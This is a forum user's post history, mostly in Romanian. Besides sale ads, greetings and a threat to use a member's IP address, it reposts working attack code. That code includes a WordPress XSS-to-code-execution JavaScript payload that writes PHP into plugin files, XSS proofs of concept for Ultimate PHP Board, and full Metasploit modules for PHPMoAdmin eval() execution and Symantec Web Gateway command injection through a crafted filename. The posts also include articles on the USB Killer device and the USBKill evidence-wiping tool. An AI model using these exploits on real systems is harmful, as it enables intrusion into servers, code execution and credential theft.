Jump to content

kp112

Active Members
  • Posts

    114
  • Joined

  • Last visited

Everything posted by kp112

  1. @Gecko ok multumesc se poate inchide o sa le pastrez SE POATE INCHIDE topicu
  2. @theandruala au fost investiti niste bani in ele de aceea vrea sau recuperez minim invetitia facuta ! @yoyois cum sa fie scam din moment ce extragerea va fii LIVE si baza de date cu toti inregistrati in tombola/ticket va fii publica ? sansele de a recupera conturile sunt minim din 2 motive : 1. Se schimba numerele de telefoane de pe conturi 2. Se pot schimba adresele de mail ! Daca aveti voi o alta idee de a elimia posibilitatea de SCAM astept o idee prin care sa le dau si sa imi recuperez minim investitia facuta in conturi !
  3. Salutare In primu rand SARBATORI FERICITE alaturi de cei dragi RST Detin cateva Conturi PERSONALE la anumite jocuri si m-am gandit sa le vand ca le tin degeaba de apoape 2 ani poate se bucura cineva de ele ! Ideea este in felu urmator ce as dori sa fac : Un site unde sa iti faci cont ca sa poti cumpara tichete (exemplu)1 Ticket costa 15 Lei prin care sa ii genereze un cod gen F28C2RKJ7 sau numere de la 1 - 1000000 (pot fii cumparate in numar nelimitat/limitat pentru mai multe sanse) Toate codurile sa se stranga intr`o baza de date iar dupa o anumita perioada sa extrag LIVE cu random.org numerele castigatoare sau cu altceva Are cineva o ideea despre un plugin pentru site ?
  4. se poate inchide am rezolvat multumesc
  5. m-am uitat peste tot si sunt rapciuge caut ceva mai bun
  6. Tester Retea Compatibilitate: RJ-11, RJ-45 Pret: Astept oferte. Modalitate de contact: PM. Modalitate de plata: La predare. Cantitate: 1. Oras: Bucuresti.
  7. daca pun mana pe ip-u tau iti arat eu ceva mai bun
  8. asa de dimineata ca m-am trezit cu fata la perna sa te fut cu shorten URLs al tau
  9. care sti rusa @tqcsu - USBKill — Code That Kills Computers Before They Examine USBs for Secrets este diferit fata de This 'Killer USB' can make your Computer explode [citeste cu atentie continutu ] iar This 'Killer USB' can make your Computer explode l-am pus in ro si in eng pt straini! visezi spam! logic ar trebui sa mearga practic mai vedem am inceput sa caut mai adac sa vad ce pot gasi
  10. codu sursa nu a fost divulgat de rusnac asa ca mai ai de asteptat ps: stai la coada Sursa originala : USB killer
  11. Exploit that uses a WordPress cross site scripting flaw to execute code as the administrator. /* Author: @evex_1337 Title: Wordpress XSS to RCE Description: This Exploit Uses XSS Vulnerabilities in Wordpress Plugins/Themes/Core To End Up Executing Code After The Being Triggered With Administrator Previliged User. ¯\_(?)_/¯ Reference: [url]http://research.evex.pw/?vuln=14[/url] Enjoy. */ //Installed Plugins Page plugins = (window.location['href'].indexOf('/wp-admin/') != - 1) ? 'plugins.php' : 'wp-admin/plugins.php'; //Inject "XSS" Div jQuery('body').append('<div id="xss" ></div>'); xss_div = jQuery('#xss'); xss_div.hide(); //Get Installed Plugins Page Source and Append it to "XSS" Div jQuery.ajax({ url: plugins, type: 'GET', async: false, cache: false, timeout: 30000, success: function (txt) { xss_div.html(txt); } }); //Put All Plugins Edit URL in Array plugins_edit = [ ]; xss_div.find('a').each(function () { if (jQuery(this).attr('href').indexOf('?file=') != - 1) { plugins_edit.push(jQuery(this).attr('href')); } }); //Inject Payload for (var i = 0; i < plugins_edit.length; i++) { jQuery.ajax({ url: plugins_edit[i], type: 'GET', async: false, cache: false, timeout: 30000, success: function (txt) { xss_div.html(txt); _wpnonce = jQuery('form#template').context.body.innerHTML.match('name="_wpnonce" value="(.*?)"') [1]; old_code = jQuery('form#template div textarea#newcontent') [0].value; payload = '<?php phpinfo(); ?>'; new_code = payload + '\n' + old_code; file = plugins_edit[i].split('file=') [1]; jQuery.ajax({ url: plugins_edit[i], type: 'POST', data: { '_wpnonce': _wpnonce, 'newcontent': new_code, 'action': 'update', 'file': file, 'submit': 'Update File' }, async: false, cache: false, timeout: 30000, success: function (txt) { xss_div.html(txt); if (jQuery('form#template div textarea#newcontent') [0].value.indexOf(payload) != - 1) { // Passed, this is up to you ( skiddies Filter ) injected_file = window.location.href.split('wp-admin') [0] + '/wp-content/plugins/' + file; // [url]http://localhost/wp//wp-content/plugins/504-redirects/redirects.php[/url] throw new Error(''); } } }); } }); } Source : WordPress 4.2.1 XSS / Code Execution
  12. Stick-urile USB au devenit medii de stocare universale în ultimii zece ani. Acestea sunt folosite la nivel global de c?tre oricine are de mutat fi?iere de pe un computer pe altul sau pentru stocarea unor date importante, departe de hackeri ?i de eventualele probleme care ar putea ap?rea pe PC-ul surs?. Ei bine, un pasionat de hardware din Rusia a dezvoltat USB Killer, un stick USB care poate s? distrug? orice computer în care este introdus. Partea îngrijor?toare este c? acesta arat? ca orice stick obi?nuit. De?i nu avem nicio dovad? c? acest dispozitiv func?ioneaz? cu adev?rat ?i nici nu exist? o versiune comercial? a sa, descrierea modului în care func?ioneaz? este destul de conving?toare. Creatorul s?u nu s-a hot?rât înc? dac? dore?te s? ofere la liber specifica?iile tehnice ale acestui stick sau s? încerce s? scoat? ni?te bani de pe urma lui prin crowdfunding, îns? ia aceste dou? posibilit??i în considerare. Stick-ul „bucluca?” func?ioneaz? ca un invertor. Acesta se alimenteaz? cu energie electric? de la portul USB ?i încarc? codensatorii pân? la -110 V. Când acest voltaj este atins, invertorul este oprit, iar transistorul se deschide. Acesta împinge sarcina negativ? c?tre portul USB. Procesul este repetat pân? când toate componentele din computer care mai pot s? alimenteze USB-ul cu energie electric? sunt arse de c?tre dispozitiv. Momentan nu exist? prea multe motive de îngrijorare. Cei mai mul?i utilizatori de PC-uri ?tiu deja c? nu este indicat s? folose?ti stick-uri USB din surse dubioase. Dispozitivul exist? doar în mâinile creatorului s?u, care a declarat c? nu vede prea multe aplica?ii practice pentru acesta. USB Killer-ul a fost comparat chiar ?i cu cu o bomb? nuclear?: e bine s? ai în posesie un asemenea stick, îns? nu este indicat s? îl ?i folose?ti. Source : USB Killer: un stick care poate s? distrug? orice PC
  13. USBkill — A new program that once activated, will instantly disable the laptop or computer if there is any activity on USB port. Hey Wait, don’t compare USBkill with the USB Killer stick that destroy sensitive components of a computer when plugged-in. "USBKill" is a new weapon that could be a boon for whistleblowers, journalists, activists, and even cyber criminals who want to keep their information away from police and cyber thieves. It is like, if you are caught, kill yourself. In the same fashion as terrorists do. Here I am not talking about to kill yourself, but to kill the data from your laptop if the law enforcement has caught your laptop. USBkill does exactly this by turning a thumb drive into a kill switch that if unplugged, forces systems to shut down. Hephaestos (@h3phaestos), the author of USBkill, reports that the tool will help prevent users from becoming the next Ross Ulbricht, founder of the infamous underground drug marketplace Silk Road, who was arrested in a 2013 FBI raid in which his laptop was seized by law enforcement agencies. "USBKill waits for a change on your USB ports, then immediately kills your computer," a Github document states. Completely Wipe up any pieces of evidence before Feds caught you: Generally, the kind of activities on USB port include the police installing a mouse jiggler – a tool that prevents computer systems from going to sleep, and any USB drive being removed from the computer. "If this happens you would like your computer to shut down immediately," Hephaestos says. Simply, tie a flash USB key to your ankle, and instantly start USBkill when the police or any other law enforcement official caught you with a laptop. In case, they steal or take your laptop or computer with them, they would definitely remove the USB drive that will immediately shut down your laptop. The author of USBkill states that the program could be very effective when running on a virtual machine, which would vanish when you reboot. The author says that USBKill will be added to additional commands and functions. However, it does work correctly and efficiently in its current state as well. Source: USBKill — Code That Kills Computers Before They Examine USBs for Secrets
  14. Can Hackers turn a remote computer into a bomb and explode it to kill someone, just like they do in hacker movies? Wait, wait! Before answering that, Let me tell you an interesting story about Killer USB drive: A man walking in the subway stole a USB flash drive from the outer pocket of someone else's bag. The pendrive had "128" written on it. After coming home, he inserted the pendrive into his laptop and instead discovering any useful data, he burnt half of his laptop down. The man then took out the USB pendrive, replaced the text "128" with "129" and put it in the outer pocket of his bag… Amen! I’m sure, you would really not imagine yourself being the 130th victim of this Killer perdrive, neither I. This above story was told to a Russian researcher, nicknamed Dark Purple, who found the concept very interesting and developed his own computer-frying USB Killer pendrive. He is working with electronic manufacturing company from where he ordered some circuit boards from China for creating his own USB killer stick. "When we connect it up to the USB port, an inverting DC/DC converter runs and charges capacitors to -110V," the researcher explained. "When the voltage is reached, the DC/DC is switched off. At the same time, the field transistor opens." At last, he successfully developed a well functioning USB killer pendrive which is able to effectively destroy sensitive components of a computer when plugged-in. "It is used to apply the -110V to signal lines of the USB interface. When the voltage on capacitors increases to -7V, the transistor closes and the DC/DC starts. The loop runs till everything possible is broken down. Those familiar with the electronics have already guessed why we use negative voltage here." It is not possible for hardware to prevent all damage to physical systems in some scenarios. It may be possible for an attacker to exploit SCADA vulnerabilities and remove safety controls used by power plants or put it into an unstable state. Stuxnet worm is one of the real example of such cyber attacks, which was designed to destroy centrifuges at the Nuclear facility and all this started from a USB drive. Also in 2014, a security firm demonstrated an attack on Apple’s Mac computer by overriding temperature controls, which can actually set the machine on fire. So if we say that a computer could be converted into a bomb, then of course it’s true, a hacker can probably make your computer explode as well. Therefore, next time when you find an unknown USB flash drive, just beware before inserting it into your laptop. Because this time it will not fire up your important files or data stored on your laptop like what malwares do, instead it will fire up your Laptop. Source : This 'Killer USB' can make your Computer explode Original Source Rusian : USB killer
  15. utila multam
  16. cat de patetici sunt cei de la utorrent mai dai in morti lor de labagi cum le-a crescut popularitatea cum a inceput cu reclame si tot felu de addon`uri foamea de bani sigur este o strategie de market asta
  17. 1 x 2TB USB Thumb drive. (2TB = 2,000GB) Note: This drive can hold up to 1000 x HD Movies Note: Do not buy a big, power hungry external HDD Note: USB Thumb drive do not have moving parts like HDD...more reliable Note: Plug into your Smart-TV and play directly (Note some TV cannot read to high memory size) Note: Use as backup for your entire PC/Laptop HDD and more! Note: Save pounds/kgs from you backpack....live you HDD at home! Brand new. Not opened. (We may check before sending if required) High speed read speed USB-2: 18 Mb/S High speed write speed USB-2: 15 Mb/s Storage life of over 10 years. Equipement Compatibility: PC/Laptop/Tablets/SmartTV/Routers/Media Servers Operating systems: Windows 7, 8, 8.1 To read and read in high speed Plug and Play Support USB zip and Disk Boot
  18. Happy birthday
  19. kp112

    Nichita

    Salut si bine ai revenit!
  20. Salutare si bine ai venit!
  21. Ultimate PHP Board (UPB) 2.2.7 Cross Site Scripting Ultimate PHP Board (UPB) version 2.2.7 suffers from a cross site scripting vulnerability. # Exploit Title : Ultimate PHP Board (UPB) 2.2.7 Cross Site Scripting Vulnerability # CVE : CVE-2015-2217 # Date : 4 March 2015 # Exploit Author : CWH Underground # Discovered By : ZeQ3uL # Site : www.2600.in.th # Vendor Homepage : http://www.myupb.com # Software Link : http://downloads.sourceforge.net/project/textmb/UPB/UPB%202.2.7/upb2.2.7.zip # Version : 2.2.7 ,--^----------,--------,-----,-------^--, | ||||||||| `--------' | O .. CWH Underground .. `+---------------------------^----------| `\_,-------, _________________________| / XXXXXX /`| / / XXXXXX / `\ / / XXXXXX /\______( / XXXXXX / / XXXXXX / (________( `------' #################### SOFTWARE DESCRIPTION #################### Ultimate PHP Board is completely text based making it easy for anybody who has access to PHP can run a message board of their own without the need for MySQL. #################################### DESCRIPTION FOR CROSS SITE SCRIPTING #################################### myUPB is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. myUPB 2.2.7 is vulnerable; other versions may also be affected. #################### VULNERABILITY DETAIL #################### 1. Reflect Cross Site Scripting (search.php) POC: /search.php?q='><script>alert(1)</script> 2. Stored Cross Site Scripting (profile.php) POC: POST /upb/profile.php HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: th-th,th;q=0.8,en-us;q=0.6,en-gb;q=0.4,en;q=0.2 Accept-Encoding: gzip, deflate Referer: http://localhost/upb/profile.php Cookie: timezone=0; lastvisit=1425552811; user_env=test; uniquekey_env=8806b913721aaf992f09134c89031d58; power_env=1; id_env=2; PHPSESSID=5jjiir5d83mbqh2s7da0gckd97 Connection: keep-alive Content-Type: multipart/form-data; boundary=---------------------------287611866431947 Content-Length: 716 -----------------------------287611866431947 Content-Disposition: form-data; name="u_email" t@t.com -----------------------------287611866431947 Content-Disposition: form-data; name="u_loca" th -----------------------------287611866431947 Content-Disposition: form-data; name="avatar" images/avatars/chic.jpg'><script>alert("hacked");</script> -----------------------------287611866431947 Content-Disposition: form-data; name="u_site" http:// -----------------------------287611866431947 Content-Disposition: form-data; name="u_timezone" 0 -----------------------------287611866431947 Content-Disposition: form-data; name="u_edit" Submit -----------------------------287611866431947-- ################################################################################################################ Greetz : ZeQ3uL, JabAv0C, p3lo, Sh0ck, BAD $ectors, Snapter, Conan, Win7dos, Gdiupo, GnuKDE, JK, Retool2 ################################################################################################################ Source
  22. PHPMoAdmin 1.1.2 Remote Code Execution This Metasploit module exploits an arbitrary PHP command execution vulnerability due to a dangerous use of eval() in PHPMoAdmin. ## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit4 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient def initialize(info = {}) super(update_info(info, 'Name' => 'PHPMoAdmin 1.1.2 Remote Code Execution', 'Description' => %q{ This module exploits an arbitrary PHP command execution vulnerability due to a dangerous use of eval() in PHPMoAdmin. }, 'Author' => [ 'Pichaya Morimoto pichaya[at]ieee.org', # Public PoC 'Ricardo Jorge Borges de Almeida <ricardojba1[at]gmail.com>', # Metasploit module ], 'License' => MSF_LICENSE, 'References' => [ [ 'CVE', '2015-2208' ], [ 'EDB', '36251' ], [ 'URL', 'http://seclists.org/fulldisclosure/2015/Mar/19' ], [ 'URL', 'http://seclists.org/oss-sec/2015/q1/743' ] ], 'Privileged' => false, 'Platform' => 'php', 'Arch' => ARCH_PHP, 'Targets' => [ [ 'PHPMoAdmin', { } ], ], 'DisclosureDate' => 'Mar 03 2015', 'DefaultTarget' => 0)) register_options( [ OptString.new('TARGETURI', [true, "The URI path of the PHPMoAdmin page", "/"]) ], self.class) end def check testrun = Rex::Text::rand_text_alpha(10) res = send_request_cgi({ 'uri' => normalize_uri(target_uri,'moadmin.php'), 'method' => 'POST', 'vars_post' => { 'object' => "1;echo '#{testrun}';exit", } }) if res and res.body.include?(testrun) return Exploit::CheckCode::Vulnerable end Exploit::CheckCode::Safe end def exploit print_status("Executing payload...") res = send_request_cgi({ 'uri' => normalize_uri(target_uri,'moadmin.php'), 'method' => 'POST', 'vars_post' => { 'object' => "1;eval(base64_decode('#{Rex::Text.encode_base64(payload.encoded)}'));exit" } }) end end Source
  23. LA MUNCA NU MAI VISATI la bani cazuti din cer !
  24. This Metasploit module exploits a command injection vulnerability found in Symantec Web Gateway's setting restoration feature. The filename portion can be used to inject system commands into a syscall function, and gain control under the context of HTTP service. For Symantec Web Gateway 5.1.1, you can exploit this vulnerability by any kind of user. However, for version 5.2.1, you must be an administrator. ## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient def initialize(info={}) super(update_info(info, 'Name' => "Symantec Web Gateway 5 restore.php Post Authentication Command Injection", 'Description' => %q{ This module exploits a command injection vulnerability found in Symantec Web Gateway's setting restoration feature. The filename portion can be used to inject system commands into a syscall function, and gain control under the context of HTTP service. For Symantec Web Gateway 5.1.1, you can exploit this vulnerability by any kind of user. However, for version 5.2.1, you must be an administrator. }, 'License' => MSF_LICENSE, 'Author' => [ 'Egidio Romano', # Original discovery & assist of MSF module 'sinn3r' ], 'References' => [ [ 'CVE', '2014-7285' ], [ 'OSVDB', '116009' ], [ 'BID', '71620' ], [ 'URL', 'http://karmainsecurity.com/KIS-2014-19' ], [ 'URL', 'http://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=&suid=20141216_00'] ], 'Payload' => { 'Compat' => { 'PayloadType' => 'cmd', 'RequiredCmd' => 'generic python' } }, 'DefaultOptions' => { 'RPORT' => 443, 'SSL' => true, 'SSLVersion' => 'TLS1' }, 'Platform' => ['unix'], 'Arch' => ARCH_CMD, 'Targets' => [ ['Symantec Web Gateway 5', {}] ], 'Privileged' => false, 'DisclosureDate' => "Dec 16 2014", # Symantec security bulletin (Vendor notified on 8/10/2014) 'DefaultTarget' => 0)) register_options( [ OptString.new('TARGETURI', [true, 'The URI to Symantec Web Gateway', '/']), OptString.new('USERNAME', [true, 'The username to login as']), OptString.new('PASSWORD', [true, 'The password for the username']) ], self.class) end def protocol ssl ? 'https' : 'http' end def check uri = target_uri.path res = send_request_cgi({'uri' => normalize_uri(uri, 'spywall/login.php')}) if res && res.body.include?('Symantec Web Gateway') return Exploit::CheckCode::Detected end Exploit::CheckCode::Safe end def get_sid sid = '' uri = target_uri.path res = send_request_cgi({ 'uri' => normalize_uri(uri, 'spywall/login.php'), 'method' => 'GET', }) unless res fail_with(Failure::Unknown, 'Connection timed out while retrieving PHPSESSID') end cookies = res.get_cookies sid = cookies.scan(/(PHPSESSID=\w+);*/).flatten[0] || '' sid end def login(sid) uri = target_uri.path res = send_request_cgi({ 'uri' => normalize_uri(uri, 'spywall/login.php'), 'method' => 'POST', 'cookie' => sid, 'headers' => { 'Referer' => "#{protocol}://#{peer}/#{normalize_uri(uri, 'spywall/login.php')}" }, 'vars_post' => { 'USERNAME' => datastore['USERNAME'], 'PASSWORD' => datastore['PASSWORD'], 'loginBtn' => 'Login' } }) unless res fail_with(Failure::Unknown, 'Connection timed out while attempting to login') end cookies = res.get_cookies sid = cookies.scan(/(PHPSESSID=\w+);*/).flatten[0] || '' if res.headers['Location'] =~ /executive_summary\.php$/ && !sid.blank? # Successful login return sid else # Failed login fail_with(Failure::NoAccess, "Bad username or password: #{datastore['USERNAME']}:#{datastore['PASSWORD']}") end end def build_payload # At of today (Feb 27 2015), there are only three payloads this module will support: # * cmd/unix/generic # * cmd/unix/reverse_python # * cmd/unix/reverse_python_ssl p = payload.encoded case datastore['PAYLOAD'] when /cmd\/unix\/generic/ # Filter that one out, Mr. basename() p = Rex::Text.encode_base64("import os ; os.system('#{Rex::Text.encode_base64(p)}'.decode('base64'))") p = "python -c \"exec('#{p}'.decode('base64'))\"" else p = p.gsub(/python -c "exec/, 'python -c \\"exec') p = p.gsub(/decode\('base64'\)\)"/, "decode('base64'))\\\"") end p end def build_mime p = build_payload data = Rex::MIME::Message.new data.add_part("#{Time.now.to_i}", nil, nil, 'form-data; name="posttime"') data.add_part('maintenance', nil, nil, 'form-data; name="configuration"') data.add_part('', 'application/octet-stream', nil, 'form-data; name="licenseFile"; filename=""') data.add_part('24', nil, nil, 'form-data; name="raCloseInterval"') data.add_part('', nil, nil, 'form-data; name="restore"') data.add_part("#{Rex::Text.rand_text_alpha(4)}\n", 'text/plain', nil, "form-data; name=\"restore_file\"; filename=\"#{Rex::Text.rand_text_alpha(4)}.txt; #{p}\"") data.add_part('Restore', nil, nil, 'form-data; name="restoreFile"') data.add_part('0', nil, nil, 'form-data; name="event_horizon"') data.add_part('0', nil, nil, 'form-data; name="max_events"') data.add_part(Time.now.strftime("%m/%d/%Y"), nil, nil, 'form-data; name="cleanlogbefore"') data.add_part('', nil, nil, 'form-data; name="testaddress"') data.add_part('', nil, nil, 'form-data; name="pingaddress"') data.add_part('and', nil, nil, 'form-data; name="capture_filter_op"') data.add_part('', nil, nil, 'form-data; name="capture_filter"') data end def inject_exec(sid) uri = target_uri.path mime = build_mime # Payload inside send_request_cgi({ 'uri' => normalize_uri(uri, 'spywall/restore.php'), 'method' => 'POST', 'cookie' => sid, 'data' => mime.to_s, 'ctype' => "multipart/form-data; boundary=#{mime.bound}", 'headers' => { 'Referer' => "#{protocol}://#{peer}#{normalize_uri(uri, 'spywall/mtceConfig.php')}" } }) end def save_cred(username, password) service_data = { address: rhost, port: rport, service_name: protocol, protocol: 'tcp', workspace_id: myworkspace_id } credential_data = { module_fullname: self.fullname, origin_type: :service, username: username, private_data: password, private_type: :password }.merge(service_data) credential_core = create_credential(credential_data) login_data = { core: credential_core, last_attempted_at: DateTime.now, status: Metasploit::Model::Login::Status::SUCCESSFUL }.merge(service_data) create_credential_login(login_data) end def exploit print_status("Getting the PHPSESSID...") sid = get_sid if sid.blank? print_error("Failed to get the session ID. Cannot continue with the login.") return end print_status("Attempting to log in as #{datastore['USERNAME']}:#{datastore['PASSWORD']}") sid = login(sid) if sid.blank? print_error("Failed to get the session ID from the login process. Cannot continue with the injection.") return else # Good password, keep it save_cred(datastore['USERNAME'], datastore['PASSWORD']) end print_status("Trying restore.php...") inject_exec(sid) end end Source
×
×
  • Create New...